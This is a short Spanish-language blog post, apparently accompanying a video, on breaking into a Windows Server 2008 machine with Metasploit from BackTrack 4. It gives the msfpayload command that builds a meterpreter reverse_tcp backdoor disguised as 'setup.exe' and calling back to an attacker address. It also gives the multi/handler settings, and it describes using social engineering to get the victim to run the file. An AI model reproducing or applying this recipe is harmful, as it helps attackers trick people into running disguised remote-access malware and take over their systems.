msf>multi/handler>creando .exe con payload
Host atacante: Backtrack 4
Host victima: Windows Server 2008 / Firewall on!
---------------------------------------------------------------------------
Creando ejecutable:
/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST:192.168.182.1 LPORT=4444 X > /root/setup.exe
--------------------------------------------------------------------------
Exploit : multi/handler
Payload : windows/meterpreter/reverse_tcp
Este video muestro la forma de de ingresar a un sistema Windows Server 2008, aqui lo que hacemos es utilizar un poco de ingienieria social y hacer que el host victima ejecute el .exe para que se establesca la conexion.
Mas definicion -----------------> Video
No hay comentarios:
Publicar un comentario